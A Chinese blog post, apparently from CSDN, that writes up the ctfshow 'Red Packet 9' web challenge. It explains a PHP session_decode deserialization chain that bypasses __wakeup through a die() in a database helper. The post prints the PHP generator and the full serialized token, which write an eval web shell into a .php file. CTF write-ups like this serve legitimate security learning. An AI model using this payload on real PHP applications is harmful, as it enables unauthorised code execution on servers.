ctfshow红包9

已于 2023-08-25 15:38:30 修改
阅读量182 收藏
点赞数
文章标签: web安全
于 2023-08-25 15:37:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzy15562159122/article/details/132496733
版权
文章讲述了作者通过分析CTFShow的源码,发现了一个利用PHP反序列化功能执行恶意代码的漏洞。通过构造特定的token和payload,利用`userLogger`类中的异常处理机制,成功绕过`wakeup`函数,实现了命令执行。
摘要由CSDN通过智能技术生成

ctfshow红包9

只能说非常之侥幸,ctfshow改不了名字,所现在用的还是wws
在这里插入图片描述

源码分析

源码太多了就不发了,看到源码一堆类,应该是需要反序列化了,看一下关键部分common.php的getLoginName函数,发现有一个session_decode()

在这里插入图片描述

去看了一下session_decode的用法,结果如下

在这里插入图片描述

这里就想到如果我把后面内容换成类,那么是不是可以触发反序列化呢?

在这里插入图片描述

问了一下chatgpt,然后在远端试了一下,确实如此

触发条件

触发条件是没有data且存在get参数token(详见上面截图),溯源一下,发现这个函数在templates/main.php中被引用

在这里插入图片描述

这里我们继续溯源,发现在index.php存在这样一段代码

在这里插入图片描述

分析上面的switch case,我们可以得到这里的action需要为main

所以我们需要做的就是让action为main并传入一个token值(格式为user|xxxxxx)

userLogger类分析

class userLogger{

    public $username;
    private $password;
    private $filename;

    public function __construct(){
        $this->filename = "log.txt_$this->username-$this->password";
    }
    public function setLogFileName($filename){
        $this->filename = $filename;
    }

    public function __wakeup(){
        $this->filename = "log.txt";
    }
    public function user_register($username,$password){
        $this->username = $username;
        $this->password = $password;
        $data = "操作时间:".date("Y-m-d H:i:s")."用户注册: 用户名 $username 密码 $password\n";
        file_put_contents($this->filename,$data,FILE_APPEND);
    }

    public function user_login($username,$password){
        $this->username = $username;
        $this->password = $password;
        $data = "操作时间:".date("Y-m-d H:i:s")."用户登陆: 用户名 $username 密码 $password\n";
        file_put_contents($this->filename,$data,FILE_APPEND);
    }

    public function user_logout(){
        $data = "操作时间:".date("Y-m-d H:i:s")."用户退出: 用户名 $this->username\n";
        file_put_contents($this->filename,$data,FILE_APPEND);
    }

    public function __destruct(){
        $data = "最后操作时间:".date("Y-m-d H:i:s")." 用户名 $this->username 密码 $this->password \n";
        $d = file_put_contents($this->filename,$data,FILE_APPEND);
        
    }
}

简单分析一下可以得到基本思路,用用户名或者密码写shell,通过修改“日志”的名称执行php代码,进而命令执行,但是这里就遇到了一个问题,我们在反序列化时会先调用wakeup函数,而wakeup会将“日志”重命名为log.txt,所以这里就必须得绕过了,试过了CVE 2016-7124,没用,也试过将filename引用username的值,但引用之后两个都会被wakeup覆盖,具体实验流程我就不写了。

这里想到了前几个月做过的一道题,tostring触发了异常导致无法触发destruct,哦吼?那是不是也可以触发异常导致没法wakeup?然后又对userLogger类进了溯源

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

分析图一的代码,就可以发现这个debug非常的奇怪,跟踪发现是用来触发图二的log_last_user函数,继续对函数进行跟踪可以发现图三的代码,大致是数据库连接用的,发现了什么?发现有die,哦吼?那是不是只要触发了这个异常就可以不执行wakeup呢?payload如下

<?php
class mysql_helper{
    private $db;
}
class application{
    public $loger;
    public $debug=true;
    public $mysql;
    public function __construct(){
        $this->loger = new userLogger();
        $this->mysql = new mysql_helper();
        }
    }
class userLogger{

        public $username='<?php eval($_POST[chuling]); ?>';
        public $password="name";
        public $filename="2.php";
        }
 $a = new application();
echo serialize($a);

我这里运行后username中的代码没法显示,得手动添加,加完直接传,记得fast_destruct

token=user|O:11:"application":3:{s:5:"loger";O:10:"userLogger":3:{s:8:"username";s:31:"<?php eval($_POST[chuling]); ?>";s:8:"password";s:4:"name";s:8:"filename";s:5:"3.php";}s:5:"debug";b:1;s:5:"mysql";O:12:"mysql_helper":1:{s:16:"mysql_helperdb";N;}}

结果如下:
在这里插入图片描述

在这里插入图片描述

已经可以命令执行了。

Chu0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfshow 红包第九 ssrf
qq_40327508的博客
11-25 1041
通过抓包登陆界面,发现存在ssrf漏洞 在通过ps猜测是ssrf打mysql 使用gopherus工具生成ssrf打mysql 的payload 之后放到burp中把参数在url编码一次 查看是否成功写入文件 成功写入,使用蚁剑连接
ctfshow-web-红包第九
HAI_WD的博客
09-12 337
文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取。
CTFshow--VIP限免题目wp
2402_82963715的博客
07-28 348
14. 扫描到/editor,拼接/editor,点击上传文件可看到文件目录,找到nothinghere/fl000g.txt/,拼接文件目录得到flag。20.asp+access架构的数据库文件为db.mdb,在URL添加/db/db.mdb,下载后在mdb文件中查找flag。18.查看网页源代码,找到js文件,在游戏代码中找到大于100分的字符串,用Unicode反编码得到flag。16.访问/tz.php,查看php参数,点击phpinfo超链接,在phpinfo界面中查找flag。
ctfshow 红包第九 ssrf
m0_46412682的博客
07-14 1084
开始的页面 随便输入一个username,好像是报错 burpsuit抓包 在输入username和密码那里好像有ssrf,输入一个http://www.baid.com,看它有没有返回百度的页面,有则存在ssrf漏洞,经测试是有的 虽然题目提示PS:由于出现权限问题,取消了mysql密码,端口还 原为3306,但是还是要试下file读取本地文件,看下有没flag.txt 经测试是没有的,那就按题目的提示,ssrf攻击mysql,这里用到gopher协议和gopherus工具。 gopherus工具http
CTFshow 限时活动 红包挑战9 详细题解
Jay17的博客
08-24 874
CTFshow 限时活动 红包挑战9 详细题解 集合了目前所有可能的方法,并且加以补充,希望对你有所帮助~
【CTFshow】 红包题 ——持续更新中
algae
04-19 1361
红包红包题 葵花宝典 直接注册,登陆,拿到flag
ctfshow-红包题第五
m0_67507776的博客
04-19 814
1.下载压缩包,正常解压得到“《画》.mp3”,各种针对音频没有作用,上当,结束...... 2.本题zip里面隐藏了一个图片,需要用foremost分离出来 3.使用steghide得到隐写flag.txt文本文件,密码是猜的123456 steghide info .\xx.jpg #检测文件 steghide extract -sf .\xx.jpg #分离文件 4.得到flag.txt aHR0cHM6Ly93d3cubGFuem91cy...
CTFSHOW WEB题目
qq_45655564的博客
08-09 2923
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
ctfshow_misc 杂项9
菜的一批
04-21 1441
拿到题之后是个zip的压缩包将压缩包解压后,出来一张很小的图片,使用010editor后无果 直接上kali使用foremost分离后,得出来9张png图片 将这9张png图片按顺序拼到一起得到一张图片。 直接上”StegSolve“工具,找到Red plane7将这张图片保存下来。 将图片保存下来后,经过大佬的指点才得知这个是汉信码,目前情况是缺少定位符,百度一下汉信符。将定位符扣下来拼接一下。 拼好之后进行扫描,刚开始用二维码识别器进行扫描,一直无法识...
ctfshow-web-红包题 耗子尾汁
HAI_WD的博客
09-08 292
ctfshow-web-红包题 耗子尾汁
ctfshow-web-红包题第七
HAI_WD的博客
08-27 302
发现一个.git文件403,这种情况通常都是存在文件夹,但是不能直接访问文件夹导致的。那么我们可以使用git_extract工具进行获取内容。蚁剑连接一下,发现无法下载文件,disable_functions会限制一些内容。那么直接使用蚁剑插件进行绕过即可。首先上来访问就是phpinfo。常规思路先扫一下目录。wx公众号,发送关键字 git 获取。git_extract工具可以搜索。发现一个backdoor.php文件。
CTF show 红包题第一
羽的博客
02-17 1697
题目地址:https://ctf.show 解压缩压缩包得到如下文件 每个压缩包中都存在一张图片,用010editor打开第一张图片,在二进制的最后发现了base64 依次打开第二第三张图片,均存在base64,猜测每一张图片中均存在部分base64片段为,刚好每一张的base64长度为100。接下来就是去将所有的base64连起来。 介于图片数量过多,所以使用通过脚本进行操作。 将脚本放入压...
[CTFSHOW]SSRF
Y4tacker的博客
01-12 1811
web351 首先代码审计,简简单单的使用php的curl,发现没有过滤,尝试读取本地文件 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_clo
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1120
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
【网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 273
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
09-06 773
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1622
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
什么是网络安全
网络研究观
09-04 2489
了解不同类型的网络安全和主要形式的网络威胁。
ctfshow misc9
09-02
"CTFShow misc9"通常是指网络安全领域中的一种挑战,其中"CTF"代表Capture The Flag竞赛,这是一种常见的网络安全实战活动,通过解决各种谜题、漏洞挖掘、密码学等问题来测试参赛者的技能。"Misc9"可能是某场CTF比赛...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值